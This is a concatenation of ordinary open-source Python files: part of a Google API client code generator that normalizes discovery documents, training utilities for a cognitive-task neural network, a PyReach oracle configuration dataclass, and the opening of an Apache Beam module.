if prop.values['wireName'] == info['discriminant']:
# Filter out the discriminant property as it is already
# contained in the base type.
schema.SetTemplateValue(
'properties',
[p for p in schema.values.get('properties') if p != prop])
break
else:
logging.warn("Variant schema '%s' for base schema '%s' "
"has not the expected discriminant property '%s'.",
name, info['schema'].values['wireName'],
info['discriminant'])
schema.SetTemplateValue('superClass', info['schema'].class_name)
      # TODO(user): baseType is for backwards compatibility only. It should
# have always been a different name. When the old Java generators roll
# off, remove it.
schema.SetTemplateValue('baseType', info['schema'].class_name)
schema.SetTemplateValue('discriminantValue', info['value'])
def _NormalizeOwnerInformation(self):
"""Ensure that owner and ownerDomain are set to sane values."""
owner_domain = self.get('ownerDomain', '')
if not owner_domain:
root_url = self.get('rootUrl')
if root_url:
owner_domain = urlparse.urlparse(root_url).hostname
# Normalize google domains.
if any(owner_domain.endswith(d) for d in _RECOGNIZED_GOOGLE_DOMAINS):
owner_domain = 'google.com'
if owner_domain:
owner_domain = utilities.SanitizeDomain(owner_domain)
else:
owner_domain = _DEFAULT_OWNER_DOMAIN
self.SetTemplateValue('ownerDomain', owner_domain)
if not self.get('ownerName'):
if owner_domain == _DEFAULT_OWNER_DOMAIN:
owner_name = _DEFAULT_OWNER_NAME
else:
owner_name = owner_domain.replace('.', '_')
self.SetTemplateValue('ownerName', owner_name)
if not self.get('owner'):
self.SetTemplateValue('owner', self['ownerName'].lower())
def _NormalizeUrlComponents(self):
"""Sets template values concerning the path to the service.
Sets rootUrl and servicePath from the values given or defaults based on what
is available. Verifies them for safeness. The hierarchy of the possible
inputs is:
use rootUrl + servicePath as the best choice if it exists (v1new)
or rpcPath
or use baseUrl (v1)
or use basePath (v1)
or restBasePath (v0.3)
or default to 'api/version'
Raises:
ValueError: if the values available are inconsistent or disallowed.
"""
# If both rootUrl and servicePath exist, they equal what is in baseUrl.
root_url = self.values.get('rootUrl')
service_path = self.values.get('servicePath')
rpc_path = self.values.get('rpcPath')
if root_url:
      # oauth2 has a servicePath of "". This is weird but OK for that API, but
# it means we must explicitly check against None.
if service_path is not None:
base_url = root_url + service_path
elif rpc_path:
base_url = rpc_path
else:
raise ValueError('Neither servicePath nor rpcPath is defined.')
else:
base_url = self.values.get('baseUrl')
# If we have a full path ('https://superman.appspot.com/kryptonite/hurts'),
# then go with that, otherwise just use the various things which might
# hint at the servicePath.
best_path = (base_url
or self.values.get('basePath')
or self.values.get('restBasePath')
or '/%s/%s/' % (self.values['name'], self.values['version']))
if best_path.find('..') >= 0:
raise ValueError('api path must not contain ".." (%s)' % best_path)
    # And let urlparse do the grunt work of normalizing and parsing.
url_parts = urlparse.urlparse(best_path)
scheme = url_parts.scheme or 'https'
service_host = url_parts.netloc or _DEFAULT_SERVICE_HOST
base_path = url_parts.path
if not root_url:
self._api.SetTemplateValue('rootUrl', '%s://%s/' % (scheme, service_host))
if service_path is None:
self._api.SetTemplateValue('servicePath', base_path[1:])
# Make sure template writers do not revert
self._api.DeleteTemplateValue('baseUrl')
self._api.DeleteTemplateValue('basePath')
self._api.DeleteTemplateValue('serviceHost')
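  # Illustrative example of the normalization above (comment only, not from
  # the original source): a discovery doc with rootUrl='https://www.googleapis.com/'
  # and servicePath='drive/v2/' keeps both values as given, while an older doc
  # that only defines basePath='/drive/v2/' falls back to the default service
  # host, producing rootUrl='https://www.googleapis.com/' and servicePath='drive/v2/'.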
def ModelClasses(self):
"""Return all the model classes."""
ret = set(
s for s in self._schemas.itervalues()
if isinstance(s, Schema) or isinstance(s, data_types.MapDataType))
return sorted(ret, key=operator.attrgetter('class_name'))
def TopLevelModelClasses(self):
"""Return the models which are not children of another model."""
return [m for m in self.ModelClasses() if not m.parent]
def DataTypeFromJson(self, type_dict, default_name, parent=None,
wire_name=None):
"""Returns a schema object represented by a JSON Schema dictionary.
Evaluate a JSON schema dictionary and return an appropriate schema object.
If a data type is defined in-line, then create the schema dynamically. If
the schema is a $ref to another, return the previously created schema or
a lazy reference.
If the type_dict is None, a blank schema will be created.
Args:
type_dict: A dict of the form expected of a request or response member
of a method description. See the Discovery specification for more.
default_name: The unique name to give the schema if we have to create it.
parent: The schema where I was referenced. If we cannot determine that
this is a top level schema, set the parent to this.
wire_name: The name which will identify objects of this type in data on
the wire.
Returns:
A Schema object.
"""
# new or not initialized, create a fresh one
schema = Schema.Create(self, default_name, type_dict or {}, wire_name,
parent)
# Only put it in our by-name list if it is a real object
if isinstance(schema, Schema) or isinstance(schema, data_types.MapDataType):
# Use the path to the schema as a key. This means that an anonymous class
# for the 'person' property under the schema 'Activity' will have the
# unique name 'Activity.person', rather than 'ActivityPerson'.
path = '.'.join(
[a.values.get('wireName', '<anon>') for a in schema.full_path])
_LOGGER.debug('DataTypeFromJson: add %s to cache', path)
self._schemas[path] = schema
return schema
def AddMethod(self, method):
"""Add a new method to the set of all methods."""
self._all_methods.append(method)
self._methods_by_name[method.values['rpcMethod']] = method
def MethodByName(self, method_name):
"""Find a method by name.
Args:
method_name: (str) the full RPC name of a method defined by this API.
Returns:
Method object or None if not found.
"""
return self._methods_by_name.get(method_name)
def SchemaByName(self, schema_name):
"""Find a schema by name.
Args:
schema_name: (str) name of a schema defined by this API.
Returns:
Schema object or None if not found.
"""
return self._schemas.get(schema_name, None)
def SetVariantInfo(self, ref, discriminant, value, schema):
"""Sets variant info for the given reference."""
if ref in self._variant_info:
logging.warning("Base type of '%s' changed from '%s' to '%s'. "
"This is an indication that a variant schema is used "
"from multiple base schemas and may result in an "
"inconsistent model.",
                      ref, self._variant_info[ref]['schema'].wireName,
                      schema.wireName)
self._variant_info[ref] = {'discriminant': discriminant, 'value': value,
'schema': schema}
def VisitAll(self, func):
"""Visit all nodes of an API tree and apply a function to each.
Walks a tree and calls a function on each element of it. This should be
called after the API is fully loaded.
Args:
func: (function) Method to call on each object.
"""
_LOGGER.debug('Applying function to all nodes')
func(self._containing_module)
func(self._module)
func(self._model_module)
for resource in self.values['resources']:
self._VisitResource(resource, func)
# Top level methods
for method in self.values['methods']:
self._VisitMethod(method, func)
for parameter in self.values['parameters']:
func(parameter)
func(parameter.data_type)
for schema in self._schemas.values():
self._VisitSchema(schema, func)
for scope in self.GetTemplateValue('authscopes') or []:
func(scope)
def _VisitMethod(self, method, func):
"""Visit a method, calling a function on every child.
Args:
method: (Method) The Method to visit.
func: (function) Method to call on each object.
"""
func(method)
for parameter in method.parameters:
func(parameter)
def _VisitResource(self, resource, func):
"""Visit a resource tree, calling a function on every child.
Calls down recursively to sub resources.
Args:
resource: (Resource) The Resource to visit.
func: (function) Method to call on each object.
"""
func(resource)
for method in resource.values['methods']:
self._VisitMethod(method, func)
for r in resource.values['resources']:
self._VisitResource(r, func)
def _VisitSchema(self, schema, func):
"""Visit a schema tree, calling a function on every child.
Args:
schema: (Schema) The Schema to visit.
func: (function) Method to call on each object.
"""
func(schema)
func(schema.module)
for prop in schema.values.get('properties', []):
func(prop)
for child in self.children:
func(child)
# Do not warn about unused arguments, pylint: disable=unused-argument
def ToClassName(self, s, element, element_type=None):
"""Convert a name to a suitable class name in the target language.
This default implementation camel cases the string, which is appropriate
for some languages. Subclasses are encouraged to override this.
Args:
s: (str) A rosy name of data element.
element: (object) The object we are making a class name for.
element_type: (str) Deprecated. The kind of object we are making a class
name for. E.g. resource, method, schema.
TODO(user): replace type in favor of class of element, but that will
require changing the place where we call ToClassName with no element.
Returns:
A name suitable for use as a class in the generator's target language.
"""
return utilities.CamelCase(s).replace(' ', '')
def NestedClassNameForProperty(self, name, schema):
"""Returns the class name of an object nested in a property."""
# TODO(user): This functionality belongs in the language model, but
# because of the way the api is bootstrapped, that isn't available when we
# need it. When language model is available from the start, this should be
# moved.
return '%s%s' % (schema.class_name, utilities.CamelCase(name))
@property
def class_name(self):
return self.values['className']
@property
def model_module(self):
return self._model_module
@property
def containing_module(self):
return self._containing_module
@property
def all_methods(self):
"""All the methods in the entire API."""
return self._all_methods
@property
def top_level_methods(self):
"""All the methods at the API top level (not in a resource)."""
return self._top_level_methods
class Resource(template_objects.CodeObject):
def __init__(self, api, name, def_dict, parent=None):
"""Creates a Resource.
Args:
api: (Api) The Api which owns this Resource.
name: (string) The discovery name of the Resource.
def_dict: (dict) The discovery dictionary for this Resource.
parent: (CodeObject) The resource containing this method, if any. Top
level resources have the API as a parent.
"""
super(Resource, self).__init__(def_dict, api, parent=parent, wire_name=name)
self.ValidateName(name)
class_name = api.ToClassName(name, self, element_type='resource')
self.SetTemplateValue('className', class_name)
# Replace methods dict with Methods
self._methods = []
method_dict = self.values.get('methods') or {}
for name in sorted(method_dict):
self._methods.append(Method(api, name, method_dict[name], parent=self))
self.SetTemplateValue('methods', self._methods)
# Get sub resources
self._resources = []
r_def_dict = self.values.get('resources') or {}
for name in sorted(r_def_dict):
r = Resource(api, name, r_def_dict[name], parent=self)
self._resources.append(r)
self.SetTemplateValue('resources', self._resources)
@property
def methods(self):
return self._methods
@property
def methods_dict(self):
return {method['wireName']: method for method in self._methods}
class AuthScope(template_objects.CodeObject):
"""The definition of an auth scope.
An AuthScope defines these template values
value: The scope url
name: a sanitized version of the value, transformed so it generally can
    be used as an identifier in code. Deprecated, use constantName
description: the description of the scope.
It also provides a template property which can be used after a language
binding is set.
constantName: A transformation of the value so it is suitable as a constant
name in the specific language.
"""
GOOGLE_PREFIX = 'https://www.googleapis.com/auth/'
HTTPS_PREFIX = 'https://'
def __init__(self, api, value, def_dict):
"""Construct an auth scope.
Args:
api: (Api) The Api which owns this Property
value: (string) The unique identifier of this scope, often a URL
def_dict: (dict) The discovery dictionary for this auth scope.
"""
super(AuthScope, self).__init__(def_dict, api, wire_name=value)
self._module = api.module
self.SetTemplateValue('value', value)
while value.endswith('/'):
value = value[:-1]
if 'description' not in self.values:
self.SetTemplateValue('description', value)
# Strip the common prefix to get a unique identifying name
if value.startswith(AuthScope.GOOGLE_PREFIX):
scope_id = value[len(AuthScope.GOOGLE_PREFIX):]
elif value.startswith(AuthScope.HTTPS_PREFIX):
      # some common scopes are just a URL
scope_id = value[len(AuthScope.HTTPS_PREFIX):]
else:
scope_id = value
# We preserve the value stripped of the most common prefixes so we can
# use it for building constantName in templates.
self.SetTemplateValue('lastPart', scope_id)
# replace all non alphanumeric with '_' to form 'name'
name = ''.join([(c if c.isalnum() else '_') for c in scope_id.upper()])
self.SetTemplateValue('name', name)
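  # Worked example (comment only, not from the original source): for the scope
  # value 'https://www.googleapis.com/auth/devstorage.read_only' the common
  # prefix is stripped, 'lastPart' becomes 'devstorage.read_only' and 'name'
  # becomes 'DEVSTORAGE_READ_ONLY'.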
@property
def constantName(self): # pylint: disable=g-bad-name
"""Overrides default behavior of constantName."""
return self._language_model.ApplyPolicy('constant', self,
self.values['lastPart'])
class Method(template_objects.CodeObject):
"""The definition of a method."""
def __init__(self, api, name, def_dict, parent=None):
"""Construct a method.
Methods in REST discovery are inside of a resource. Note that the method
name and id are calculable from each other. id will always be equal to
api_name.resource_name[.sub_resource...].method_name. At least it should
be, as that is the transformation Discovery makes from the API definition,
which is essentially a flat list of methods, into a hierarchy of resources.
Args:
api: (Api) The Api which owns this Method.
name: (string) The discovery name of the Method.
def_dict: (dict) The discovery dictionary for this Method.
parent: (CodeObject) The resource containing this Method, if any.
Raises:
ApiException: If the httpMethod type is not one we know how to
handle.
"""
super(Method, self).__init__(def_dict, api, parent=(parent or api))
# TODO(user): Fix java templates to name vs. wireName correctly. Then
# change the __init__ to have wire_name=def_dict.get('id') or name
# then eliminate this line.
self.SetTemplateValue('wireName', name)
self.ValidateName(name)
class_name = api.ToClassName(name, self, element_type='method')
if parent and class_name == parent.values['className']:
# Some languages complain when the collection name is the same as the
# method name.
class_name = '%sRequest' % class_name
# The name is the key of the dict defining use. The id field is what you
# have to use to call the method via RPC. That is unique, name might not be.
self.SetTemplateValue('name', name)
# Fix up very old discovery, which does not have an id.
if 'id' not in self.values:
self.values['id'] = name
self.SetTemplateValue('className', class_name)
http_method = def_dict.get('httpMethod', 'POST').upper()
self.SetTemplateValue('httpMethod', http_method)
self.SetTemplateValue('rpcMethod',
def_dict.get('rpcMethod') or def_dict['id'])
rest_path = def_dict.get('path') or def_dict.get('restPath')
# TODO(user): if rest_path is not set, raise a good error and fail fast.
self.SetTemplateValue('restPath', rest_path)
# Figure out the input and output types and schemas for this method.
expected_request = self.values.get('request')
if expected_request:
# TODO(user): RequestBody is only used if the schema is anonymous.
# When we go to nested models, this could be a nested class off the
# Method, making it unique without the silly name. Same for ResponseBody.
request_schema = api.DataTypeFromJson(expected_request,
'%sRequestContent' % name,
parent=self)
self.SetTemplateValue('requestType', request_schema)
expected_response = def_dict.get('response') or def_dict.get('returns')
if expected_response:
response_schema = api.DataTypeFromJson(expected_response,
'%sResponse' % name,
parent=self)
if self.values['wireName'] == 'get':
response_schema.values['associatedResource'] = parent
self.SetTemplateValue('responseType', response_schema)
else:
self.SetTemplateValue('responseType', api.void_type)
# Make sure we can handle this method type and do any fixups.
if http_method not in ['DELETE', 'GET', 'OPTIONS', 'PATCH', 'POST', 'PUT',
'PROPFIND', 'PROPPATCH', 'REPORT']:
raise ApiException('Unknown HTTP method: %s' % http_method, def_dict)
if http_method == 'GET':
self.SetTemplateValue('requestType', None)
# Replace parameters dict with Parameters. We try to order them by their
# position in the request path so that the generated code can track the
# more human readable definition, rather than the order of the parameters
# in the discovery doc.
order = self.values.get('parameterOrder', [])
req_parameters = []
opt_parameters = []
for name, def_dict in self.values.get('parameters', {}).iteritems():
param = Parameter(api, name, def_dict, self)
if name == 'alt':
# Treat the alt parameter differently
self.SetTemplateValue('alt', param)
continue
# Standard params are part of the generic request class
# We want to push all parameters that aren't declared inside
# parameterOrder after those that are.
if param.values['wireName'] in order:
req_parameters.append(param)
else:
# optional parameters are appended in the order they're declared.
opt_parameters.append(param)
# pylint: disable=g-long-lambda
req_parameters.sort(lambda x, y: cmp(order.index(x.values['wireName']),
order.index(y.values['wireName'])))
# sort optional parameters by name to avoid code churn
opt_parameters.sort(lambda x, y: cmp(x.values['wireName'], y.values['wireName']))
req_parameters.extend(opt_parameters)
self.SetTemplateValue('parameters', req_parameters)
self._InitMediaUpload(parent)
self._InitPageable(api)
api.AddMethod(self)
def _InitMediaUpload(self, parent):
media_upload = self.values.get('mediaUpload')
if media_upload:
if parent:
parent.SetTemplateValue('isMedia', True)
# Get which MIME Media Ranges are accepted for media uploads to this
# method.
accepted_mime_ranges = media_upload.get('accept')
self.SetTemplateValue('accepted_mime_ranges', accepted_mime_ranges)
max_size = media_upload.get('maxSize')
self.SetTemplateValue('max_size', max_size)
self.SetTemplateValue('max_size_bytes',
convert_size.ConvertSize(max_size))
# Find which upload protocols are supported.
upload_protocols = media_upload['protocols']
for upload_protocol in upload_protocols:
self._SetUploadTemplateValues(
upload_protocol, upload_protocols[upload_protocol])
def _InitPageable(self, api):
response_type = self.values.get('responseType')
if response_type == api.void_type:
return
next_page_token_name = self.FindPageToken(
response_type.values.get('properties'))
if not next_page_token_name:
return
is_page_token_parameter = True
page_token_name = self.FindPageToken(self.optional_parameters)
if not page_token_name:
# page token may be field of request body instead of query parameter
is_page_token_parameter = False
request_type = self.values.get('requestType')
if request_type:
page_token_name = self.FindPageToken(
request_type.values.get('properties'))
if not page_token_name:
return
self.SetTemplateValue('isPageable', True)
self.SetTemplateValue('isPagingStyleStandard',
(is_page_token_parameter and
page_token_name == 'pageToken' and
next_page_token_name == 'nextPageToken'))
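  # Illustrative reading of the paging check above (comment only, not from the
  # original source): a method whose response schema has a 'nextPageToken'
  # property and whose request takes a 'pageToken' query parameter gets
  # isPageable=True and isPagingStyleStandard=True; if the token travels in the
  # request body instead, the method is still pageable but not standard style.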
def _SetUploadTemplateValues(self, upload_protocol, protocol_dict):
"""Sets upload specific template values.
Args:
upload_protocol: (str) The name of the upload protocol. Eg: 'simple' or
'resumable'.
protocol_dict: (dict) The dictionary that corresponds to this upload
protocol. It typically contains keys like 'path', 'multipart' etc.
"""
self.SetTemplateValue('%s_upload_supported' % upload_protocol, True)
upload_path = protocol_dict.get('path')
if upload_path:
self.SetTemplateValue('%s_upload_path' % upload_protocol, upload_path)
self.SetTemplateValue('%s_upload_multipart' % upload_protocol,
protocol_dict.get('multipart', False))
@property
def media_upload_parameters(self):
return self.values.get('mediaUpload')
@property
def parameters(self):
return self.values['parameters']
@property
def optional_parameters(self):
return [p for p in self.values['parameters'] if not p.required]
@property
def required_parameters(self):
return [p for p in self.values['parameters'] if p.required]
@property
def path_parameters(self):
return [p for p in self.values['parameters'] if p.location == 'path']
@property
def query_parameters(self):
return [p for p in self.values['parameters'] if p.location == 'query']
@staticmethod
def FindCodeObjectWithWireName(things, wire_name):
"""Looks for an element having the given wire_name.
Args:
things: (array of DataType) List of parameters or properties to search.
wire_name: (str) The wireName we are looking to find.
Returns:
None or element with the given wire_name.
"""
if not things: return None
for e in things:
if e.values['wireName'] == wire_name: return e
return None
@staticmethod
def FindPageToken(things):
"""Looks for an element with a wireName like a page token.
Args:
things: (array of DataType) List of parameters or properties to search.
Returns:
None or page token name found.
"""
for token_name in _PAGE_TOKEN_NAMES:
if Method.FindCodeObjectWithWireName(things, token_name):
return token_name
return None
#
# Expose some properties with the naming convention we use in templates
#
def optionalParameters(self): # pylint: disable=g-bad-name
return self.optional_parameters
def requiredParameters(self): # pylint: disable=g-bad-name
return self.required_parameters
def pathParameters(self): # pylint: disable=g-bad-name
return self.path_parameters
def queryParameters(self): # pylint: disable=g-bad-name
return self.query_parameters
class Parameter(template_objects.CodeObject):
"""The definition of a method parameter."""
def __init__(self, api, name, def_dict, method):
super(Parameter, self).__init__(def_dict, api, parent=method,
wire_name=name)
self.ValidateName(name)
self.schema = api
# TODO(user): Deal with dots in names better. What we should do is:
# For x.y, x.z create a little class X, with members y and z. Then
# have the constructor method take an X.
self._repeated = self.values.get('repeated', False)
self._required = self.values.get('required', False)
self._location = (self.values.get('location')
or self.values.get('restParameterType')
or 'query')
# TODO(user): Why not just use Schema.Create here?
referenced_schema = self.values.get('$ref')
if referenced_schema:
self._data_type = (api.SchemaByName(referenced_schema) or
data_types.SchemaReference(referenced_schema, api))
elif def_dict.get('type') == 'array':
self._data_type = Schema.Create(api, name, def_dict, name, method)
elif self.values.get('enum'):
self._data_type = data_types.Enum(def_dict,
api,
name,
self.values.get('enum'),
self.values.get('enumDescriptions'),
parent=method)
self.SetTemplateValue('enumType', self._data_type)
else:
self._data_type = data_types.PrimitiveDataType(def_dict, api, parent=self)
if self._repeated:
self._data_type = data_types.ArrayDataType(name, self._data_type,
parent=self)
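  # Illustrative note (editor's addition; the fragment is made up): a discovery
  # fragment like
  #   def_dict = {'type': 'string', 'enum': ['ASC', 'DESC'],
  #               'required': True, 'location': 'query'}
  # resolves to a data_types.Enum (also exposed as the 'enumType' template
  # value) with required=True and location='query'; a repeated parameter would
  # additionally be wrapped in an ArrayDataType.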
@property
def repeated(self):
return self._repeated
@property
def required(self):
return self._required
@property
def location(self):
return self._location
@property
def code_type(self):
return self._data_type.code_type
@property
def data_type(self):
return self._data_type
| bshaffer/google-api-php-client-services | generator/src/googleapis/codegen/api.py | Python | apache-2.0 | 37,026 |
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Training utility functions."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from six import string_types
import random
import re
import json
import numpy as np
import traceback
from cognitive import stim_generator as sg
import cognitive.constants as const
_R_MEAN = 123.68
_G_MEAN = 116.78
_B_MEAN = 103.94
def convert_to_grid(xy_coord, prefs):
"""Given a x-y coordinate, return the target activity for a grid of neurons.
Args:
xy_coord : numpy 2-D array (batch_size, 2)
prefs: numpy 2-D array (n_out_pnt, 2). x and y preferences.
Returns:
activity: numpy array (batch_size, GRID_SIZE**2)
"""
sigma2 = 0.02 # 2*sigma-squared
activity = np.exp(-((xy_coord[:, 0:1] - prefs[:, 0])**2 +
(xy_coord[:, 1:2] - prefs[:, 1])**2) / sigma2)
activity = (activity.T / np.sum(activity, axis=1)).T
return activity
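# Illustrative usage sketch (editor's addition; the values are made up): with a
# 2 x 2 grid of preferred locations covering the unit square, each x-y target
# becomes a normalized Gaussian bump over the four grid neurons:
#   prefs = np.array([[0.25, 0.25], [0.25, 0.75], [0.75, 0.25], [0.75, 0.75]])
#   xy = np.array([[0.3, 0.3], [0.7, 0.8]])    # (batch_size, 2)
#   activity = convert_to_grid(xy, prefs)      # shape (2, 4); each row sums to 1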
def map_sentence2ints(sentence):
"""Map a sentence to a list of words."""
word_list = re.findall(r"[\w']+|[.,!?;]", sentence)
int_list = [const.INPUTVOCABULARY.index(word) for word in word_list]
return np.array(int_list).astype(np.int32)
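# Illustrative note (editor's addition): the tokenizer keeps words (including
# apostrophes) and common punctuation as separate tokens, e.g.
#   re.findall(r"[\w']+|[.,!?;]", "point to the last red object .")
#   -> ['point', 'to', 'the', 'last', 'red', 'object', '.']
# Each token is then mapped to its index in const.INPUTVOCABULARY, so every
# token must already be present in that vocabulary.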
def preprocess(in_imgs_, vis_type):
"""Pre-process images."""
if (vis_type == 'vgg') or (vis_type == 'vgg_pretrain'):
in_imgs_ -= np.array([_R_MEAN, _G_MEAN, _B_MEAN], dtype=np.float32)
else:
in_imgs_ /= 255.
in_imgs_ -= np.mean(in_imgs_)
return in_imgs_
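# Illustrative note (editor's addition; the array and the 'conv' tag are made
# up): VGG-style networks get per-channel ImageNet mean subtraction, any other
# vis_type gets rescaling to [0, 1] followed by whole-batch mean centering:
#   imgs = np.random.uniform(0, 255, (2, 112, 112, 3)).astype(np.float32)
#   vgg_in = preprocess(imgs.copy(), 'vgg')   # subtracts _R_MEAN/_G_MEAN/_B_MEAN
#   cnn_in = preprocess(imgs.copy(), 'conv')  # scales to [0, 1], subtracts mean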
def tasks_to_rules(tasks):
"""Generate in_rule and seq_length arrays.
Args:
tasks: a list of tg.Task instances or string rules, length is batch_size.
"""
batch_size = len(tasks)
in_rule = np.zeros((const.MAXSEQLENGTH, batch_size), dtype=np.int64)
seq_length = np.zeros((batch_size,), dtype=np.int64)
for i_task, task in enumerate(tasks):
word_list = re.findall(r"[\w']+|[.,!?;]", str(task))
seq_length[i_task] = len(word_list)
for i_word, word in enumerate(word_list):
in_rule[i_word, i_task] = const.INPUTVOCABULARY.index(word)
return in_rule, seq_length
def set_outputs_from_tasks(n_epoch, tasks, objsets,
out_pnt_xy, out_word,
mask_pnt, mask_word):
j = 0
for epoch_now in range(n_epoch):
for task, objset in zip(tasks, objsets):
target = task(objset, epoch_now)
if target is const.INVALID:
# For invalid target, no loss is used. Everything remains zero.
pass
elif isinstance(target, sg.Loc):
# minimize point loss
out_pnt_xy[j, :] = target.value
mask_pnt[j] = 1.
elif isinstance(target, bool) or isinstance(target, sg.Attribute):
if isinstance(target, bool):
target = 'true' if target else 'false'
else:
target = target.value
# For boolean target, only minimize word loss
out_word[j] = const.OUTPUTVOCABULARY.index(target)
mask_word[j] = 1.
else:
raise TypeError('Unknown target type.')
j += 1
def set_outputs_from_targets(n_epoch, objsets,
out_pnt_xy, out_word,
mask_pnt, mask_word):
j = 0
for epoch_now in range(n_epoch):
for objset in objsets:
target = objset.targets[epoch_now]
if target == 'invalid':
# For invalid target, no loss is used. Everything remains zero.
pass
elif isinstance(target, (list, tuple)):
assert len(target) == 2, "Expected 2-D target. Got " + str(target)
# minimize point loss
out_pnt_xy[j, :] = target
mask_pnt[j] = 1.
elif isinstance(target, string_types):
out_word[j] = const.OUTPUTVOCABULARY.index(target)
mask_word[j] = 1.
else:
raise TypeError('Unknown target type: %s %s' % (type(target), target))
j += 1
def generate_batch(tasks,
n_epoch=30,
img_size=224,
objsets=None,
n_distractor=1,
average_memory_span=2):
"""Generate a batch of trials.
Return numpy arrays to feed the tensorflow placeholders.
Args:
tasks: a list of tg.Task instances, length is batch_size.
n_epoch: int, number of epochs
img_size: int, image size
objsets: None or list of ObjectSet/StaticObjectSet instances
n_distractor: int, number of distractors to add
    average_memory_span: int, the average number of epochs for which an object
      needs to be held in working memory, if it is needed at all
Returns:
All variables are numpy array of float32
in_imgs: (n_epoch*batch_size, img_size, img_size, 3)
in_rule: (max_seq_length, batch_size) the rule language input, type int32
seq_length: (batch_size,) the length of each task instruction
out_pnt: (n_epoch*batch_size, n_out_pnt)
out_pnt_xy: (n_epoch*batch_size, 2)
out_word: (n_epoch*batch_size, n_out_word)
mask_pnt: (n_epoch*batch_size)
mask_word: (n_epoch*batch_size)
Raises:
TypeError: when target type is incorrect.
"""
batch_size = len(tasks)
if objsets is None:
objsets = list()
for task in tasks:
objsets.append(
task.generate_objset(n_epoch,
n_distractor=n_distractor,
average_memory_span=average_memory_span))
max_objset_epoch = max([objset.n_epoch for objset in objsets])
assert max_objset_epoch == n_epoch, '%d != %d' % (max_objset_epoch, n_epoch)
in_imgs = sg.render(objsets, img_size)
# The rendered images are batch major
in_imgs = np.reshape(in_imgs, [batch_size, n_epoch, img_size, img_size, 3])
# Swap to time major
in_imgs = np.swapaxes(in_imgs, 0, 1)
# Outputs and masks
out_pnt_xy = np.zeros((n_epoch * batch_size, 2), dtype=np.float32)
out_word = np.zeros((n_epoch * batch_size), dtype=np.int64)
mask_pnt = np.zeros((n_epoch * batch_size), dtype=np.float32)
mask_word = np.zeros((n_epoch * batch_size), dtype=np.float32)
if isinstance(objsets[0], sg.StaticObjectSet):
set_outputs_from_targets(n_epoch, objsets,
out_pnt_xy, out_word,
mask_pnt, mask_word)
else:
set_outputs_from_tasks(n_epoch, tasks, objsets,
out_pnt_xy, out_word,
mask_pnt, mask_word)
# Process outputs
out_pnt = convert_to_grid(out_pnt_xy, const.PREFS)
# Generate rule inputs, padded to maximum number of words in a sentence
in_rule, seq_length = tasks_to_rules(tasks)
return (in_imgs, in_rule, seq_length, out_pnt, out_pnt_xy, out_word, mask_pnt,
mask_word)
def static_objsets_from_examples(examples):
"""Returns a list of StaticObjectSet objects.
Args:
examples: an iterable of dictionaries decoded from json examples.
"""
static_objsets = []
for e in examples:
static_objs = [o for multi_epoch_obj in e['objects']
for o in sg.static_objects_from_dict(multi_epoch_obj)]
static_objset = sg.StaticObjectSet(n_epoch=e['epochs'],
static_objects=static_objs,
targets=e['answers'])
static_objsets.append(static_objset)
return static_objsets
def json_to_feeds(json_examples):
if isinstance(json_examples, string_types):
json_examples = [json_examples]
examples = []
families = []
rules = []
for je in json_examples:
try:
e = json.loads(je)
except (ValueError, TypeError):
traceback.print_exc()
raise
rules.append(e['question'])
examples.append(e)
families.append(e['family'])
epochs = examples[0]['epochs']
static_objsets = static_objsets_from_examples(examples)
values = generate_batch(rules, n_epoch=epochs,
img_size=112, objsets=static_objsets,
# not used when objsets are given
n_distractor=0,
# not used when objsets are given
average_memory_span=0)
values = values + (families,)
return values
def generate_feeds(tasks, hparams, dataparams=None):
"""Generate feed dict for placeholders.
Args:
tasks: a list of tg.Task instances, length is batch_size.
hparams: hyperparameters in tf.HParams format.
dataparams: dictionary of parameters for the dataset
Returns:
feed_dict: the tensorflow feed_dict dictionary
"""
if isinstance(hparams.n_epoch, int):
n_epoch = hparams.n_epoch
else:
n_epoch = random.randrange(hparams.n_epoch[0], hparams.n_epoch[1] + 1)
# in_imgs, in_rule, seq_length, out_pnt, out_pnt_xy, out_word, mask_pnt,
# mask_word
return generate_batch(
tasks,
n_epoch=n_epoch,
img_size=112,
n_distractor=dataparams['n_distractor'],
average_memory_span=dataparams['average_memory_span']
)
| google/cog | cognitive/train_utils.py | Python | apache-2.0 | 9,504 |
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Reach oracle element used for configuration."""
import dataclasses
from pyreach.gyms import reach_element
@dataclasses.dataclass(frozen=True)
class ReachOracle(reach_element.ReachElement):
"""A Reach Oracle configuration class.
Attributes:
reach_name: The name of the Oracle.
task_code: The task code string.
    intent: The intention of the task. This argument is optional and defaults to
an empty string.
success_type: The type of success. This argument is optional and defaults
to an empty string.
is_synchronous: If True, the next Gym observation will synchronize all
observation elements that have this flag set otherwise the next
observation is asynchronous. This argument is optional and defaults to
False.
"""
task_code: str
intent: str = ""
success_type: str = ""
is_synchronous: bool = False
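# Illustrative usage sketch (editor's addition; the field values are made up
# and this assumes ReachElement declares the reach_name field described in the
# Attributes section above):
#
#   oracle_config = ReachOracle(
#       reach_name="oracle",
#       task_code="122",
#       intent="pick",
#       is_synchronous=True)
#
# The frozen dataclass is then included in the Gym environment configuration
# alongside the other reach elements.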
| google-research/pyreach | pyreach/gyms/oracle_element.py | Python | apache-2.0 | 1,448 |
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import apache_beam as beam
import logging
from typing import List, Dict, Any
